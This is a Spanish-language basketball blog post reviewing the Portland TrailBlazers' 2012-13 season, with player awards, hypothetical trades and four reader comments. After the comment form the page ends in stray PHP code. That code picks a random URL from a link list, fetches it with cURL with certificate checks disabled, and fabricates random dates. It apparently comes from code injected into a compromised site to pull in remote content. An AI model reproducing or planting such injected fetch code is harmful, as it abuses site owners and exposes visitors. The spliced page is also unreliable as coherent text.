Portland TrailBlazers: Aprobado/Bien

12 de July de 2013 por Love Denise

En el análisis previo suponíamos que los Blazers serían equipo de Lottery Draft y acertamos. No se podía esperar mucho de un equipo en reconstrucción con buenos jugadores pero con muy pocos efectivos en el banquillo y sobre todo muchos rookies (Lillard, Leonard, Claver, Freeland, etc..) cuyos rendimientos eran una incógnita.

Lo que no intuiamos era que los Blazers iban a ser tan competitivos a pesar de todas sus limitaciones e iban a dar guerra aguantando en la lucha por la octava plaza de Playoffs del Oeste, que este año ha estado muy cara, prácticamente hasta el último mes, en el que una plaga de lesiones de algunos de sus mejores hombres los descolgó de la lucha por los puestos de honor.

Como decimos, a pesar de contar con el que fue casi seguro el peor banquillo de toda la NBA, los Blazers se sobrepusieron a todas las adversidades. Liderados por su jugador franquicia Lamarcus Aldridge, más el excelente rendimiento del rookie Damian Lillard, completaron una más que digna temporada con 33 victorias y 49 derrotas a pesar del desfallecimiento final que se tradujo en 13 derrotas consecutivas en el tramo final de la campaña.

Entre sus victorias destacamos la magnífica actuación en conjunto que supuso la victoria 106-136 en casa de los a la postre subcampeones de la NBA, los San Antonio Spurs. Les endosaron 46 puntos en el último cuarto, con un Damian Lillard on-fire consagrándose en la NBA con 35 puntos y 9 asistencias, más la colaboración de otros tres jugadores (Aldridge, Hickson y Maynor) que superaron la veintena de puntos. En cambio, la derrota en New Orleans por 99-63 que suponía la quinta derrota consecutiva de una racha de 8 fue el momento más duro de la temporada. 

Como indicamos más arriba, la buena temporada llegó de la mano de su quinteto titular el cual aprendimos rapidamente de memoria: Lillard-Matthews-Batum-Aldridge-Hickson. Entre los cinco, anotaron el 78% de los puntos de su equipo, cogieron el 70% de los rebotes y suyas fueron el 75% de las asistencias. De entre los jugadores del banquillo, sólo Eric Maynor dio muestras de solidez y consistencia para permanecer en la rotación de un equipo NBA, aunque los jóvenes Leonard y Barton también dejaron algunos destellos importantes de cara al futuro. El resto del equipo…para echarle de comer aparte.

PREMIOS

MVP: Lamarcus Aldridge. 21 puntos, 9 rebotes, más de 2 asistencias, más de un tapón y casi un robo por partido, 38 dobles-dobles y 8 partidos superando el 30-10. Números de All-Star aunque en su contra podríamos decir que ha cosechado los peores porcentajes de tiro de su carrera.

Rookie: Qué facil me lo habeis puesto!!, No podía ser otro que Damian Lillard, rookie indiscutible del año y una pinta de jugón y megaestrella de la liga durante la próxima década. 19 puntos, 3 rebotes, 6’5 asistencias, 185 triples, líder del equipo en anotación en 26 partidos y 50 en asistencias, tercer jugador en la historia junto a Allen Iverson y Oscar Robertson en conseguir 20 puntos y 10 asistencias en su debut en la liga, segundo Blazer de la historia en conseguir 1.500 puntos y 500 asistencias sólo por detrás de Clyde Drexler. Tiene todas las papeletas para acabar marcando una época en la liga. ¡¡¡JUGÓN!!!

Decepción: Cierto que el aficionado no tenía muchas esperanzas puestas sobre Victor Claver pero es que teniendo en cuenta que tenía que disputarse minutos con jugadores como Luke Babbit, Will Barton y Sasha Pavlovic, mi sensación es que no lo ha podido hacer peor y no será porque no le han dado oportunidades. 16 minutos de media en 49 choques, para acabar promediando 3,8 puntos (en minutos de la basura la mayoría), 2,4 rebotes y 1 asistencia, y lo peor de todo, un 46% en tiros libres que supone el peor dato de un jugador exterior que yo recuerde. A este nivel de poco acierto unido a su alta cantidad de horchata en las venas no pasará de ser un agitatoallas.

Sorpresa: No encuentro grandes sorpresas en la plantilla de los Blazers, pero podríamos nombrar a JJ Hickson. Enorme temporada del de North Caroline que pese a su falta de centimetros, ha demostrado coraje, pundonor y lucha para acabar promediando 12’7 puntos y 10’3 rebotes, lo que supone unos 4 puntos y 4 rebotes más que el año anterior. Lástima que se haya marchado a los Nuggets.

JUGANDO A GM

En esta nueva temporada que comienza los Blazers se han mostrado bastante activos en el mercado, y se han hecho en el mercado de agentes libres con el alero Dorrell Wright por 6 millones en 2 años, y con el veterano base Earl Watson por el mínimo. Mediante traspasos, consiguieron al decpecionante pick 5 del Draft del 2012, Thomas Robinson, a cambio de segundas rondas; también por segundas rondas se hicieron con los servicios de Robin López y de Terrell Harris. En el draft, apostaron en el pick 10 por el base-escolta C.J. McCollum y por el alero Allan Crabbe en segunda ronda.

Por tanto actualmente cuentan con una plantilla más sólida, larga y profunda que el año anterior pero que tal y com está el salvaje Oeste, no les da con estos mimbres para llegar a Playoffs.

Intuyo que llegado a este punto, la franquicia no se va a mover mucho más en el mercado y la configuración de la plantilla allá por noviembre será bastante similar a la actual. Quedarán fuera de Playoffs y asegurarán un Top 12 en el Draft venidero que se avecina cargado de estrellas.

Pero cómo aquí nos gusta fantasear y ponerse en la piel de los Managers, paso a comentar los movimientos que haría para la franquicia suponiendo que no quieran tankear y quieran competir por un puesto en la élite.

– Firmaría por la bi-anual de unos 2’5 millones al agente libre Dejuan Blair.

– Desconozco el estado físico y mental en el que se encuentra Danny Granger pero su calidad unida a su condición de expiring haría que me lanzase a por él. Teniendo en cuenta que en Indiana querrán quitarselo de en medio porque tienen a una nueva estrella llamada Paul George y a un jugador abriéndose paso como Lance Stephenson, y a que lleva un año sin jugar, supongo que no exigirán demasiado e intentaría conseguirlo ofreciendole a los Pacers a un escolta tirador como Wes Matthews, más Robin López y Joel Freeland, ya que tras la marcha de Hansbrough, los de Indiana andan algo cojos en la pintura.

– Thomas Robinson por Ed Davis. Los Grizzlies han menospreciado todo este último año al ex de Toronto, por lo que supongo que no tendría reparos en traspasarlo por Robinson, el cual no ha demostrado nada en la NBA pero llega con la vitola de ser un Top 5 del Draft.

– Teniendo a Lillard, considero prescindible a McCollum, por lo cual lo traspasaría junto a Terrell Harris, Claver y una primera ronda a Phoenix por Marcin Gortat. El polaco vale mucho más que eso, pero entre que los Suns van a tankear, que han drafteado al pivot ucraniano Alex Len y que Gortat es expiring, considero que sería una buena oferta para ellos.

Así mi equipo sería el siguiente:

5 INICIAL: Lillard-Batum-Granger-Aldridge-Gortat

Banquillo: Earl Watson, Allen Crabbe, Will Barton, Dorrell Wright, Ed Davis, Dejuan Blair, Meyers Leonard.

Gran quinteto titular, pintura sólida y poderosa, buenos jugadores en el banquillo, y de cara al año que viene más de 20 millones para fichar agentes libres si Granger y Gortat no renovasen.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    wow q planteas movimientos jajajaj

    siendo algo mas realista, de lo que tienen los veo muy bien

    lopez puede ser un buen acompañante en la pintura de aldrigue, supone una mejora en centimetros e intimidacion a hickson

    los fichajes de mccollum, watson y wright haran que su banca parezca algo menos penosa, y su 5 inicial es realmente bueno

    les dara para llegar a PO? veo a aldrigue, mathews, batum y lopez en el techo de sus carreras dificilmente puedan ser mejores. Estos 4, mas los rendimientos ya conocidos de watson y wright, nos deja el salto de calidad en manos de lillard, mccollum y leonard

    si estos tres mejoran, sobretodo si lillard se hace un all-star, podran estar en PO, si se mantienen en el nivel del año pasado, quedaran a un paso

      Citar

  2. Denise dice:
    #2

    Esteban: wow q planteas movimientos jajajajsiendo algo mas realista, de lo que tienen los veo muy bienlopez puede ser un buen acompañante en la pintura de aldrigue, supone una mejora en centimetros e intimidacion a hicksonlos fichajes de mccollum, watson y wright haran que su banca parezca algo menos penosa, y su 5 inicial es realmente buenoles dara para llegar a PO? veo a aldrigue, mathews, batum y lopez en el techo de sus carreras dificilmente puedan ser mejores. Estos 4, mas los rendimientos ya conocidos de watson y wright, nos deja el salto de calidad en manos de lillard, mccollum y leonardsi estos tres mejoran, sobretodo si lillard se hace un all-star, podran estar en PO, si se mantienen en el nivel del año pasado, quedaran a un paso

    Tienen mejor plantilla que el año anterior pero las plazas de PO en el Oeste están muy caras,
    Clippers, Warriors, Thunder, Spurs, Rockets están claramente por encima de ellos, y luego gente como los Nuggets, Grizzlies, Wolves y Pelicans también.

    ¿No te gustan mis movimientos, Esteban? ..

    Si es por mi oferta por Granger, no creo que los Pacers estén en disposición de pedir más. Todas mis ofertas creo que son justas teniendo en cuenta el contexto de cada equipo y los jugadores involucrados.

    A todo esto..como está Granger fisicamente, ¿podrá volver al nivel de antaño?

      Citar

  3. Esteban dice:
    #3

    Denise: Tienen mejor plantilla que el año anterior pero las plazas de PO en el Oeste están muy caras,
    Clippers, Warriors, Thunder, Spurs, Rockets están claramente por encima de ellos, y luego gente como los Nuggets, Grizzlies, Wolves y Pelicans también.

    ¿No te gustan mis movimientos, Esteban? ..

    Si es por mi oferta por Granger, no creo que los Pacers estén en disposición de pedir más. Todas mis ofertas creo que son justas teniendo en cuenta el contexto de cada equipo y los jugadores involucrados.

    A todo esto..como está Granger fisicamente, ¿podrá volver al nivel de antaño?

    no denise no es que no me guste, es que son tantas y tan variadas que hacen perder demasiado la realidad y queda muy desdibujado en el equipo real

    fijate que pusiste a granger como titular, y sacaste a mathews, un mivimiento q bajo mi punto de vista no va a suceder, sacaste del equipo a mccollum, metiste a blair, sacaste a freeland, demasiados cambios hipoteticos

    a granger te lo regalo, ecesitemos esos 14 millones mejor gastos que en un puesto donde tenemos a george y a coopeland

      Citar

  4. rumbero dice:
    #4

    Movimientos al margen (que peligro tendrías como GM moviendo medio equipo si hace falta xD) el banquillo debe ser mucho más competitivo que el de esta temporada y sólo con eso ya deberían mejorar… al menos que no cunda el pánico cada vez que estornude uno de los titulares. Es un equipo joven que tiene margen de mejora. Luego a ver como les sale McCollum para la rotación exterior y yo no enterraría aun a Robinson que ha tenido una temporada bastante movidita pero que si encuentra su sitio detrás de Aldridge está a tiempo de hacer cosas interesantes en esta liga. Eso y cruzar los dedos para que no les visite el mal fario típico de Porltand y Lillard siga sano por mucho tiempo y progresando a este nível. Debe ser el que los guie a cotas mayores

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>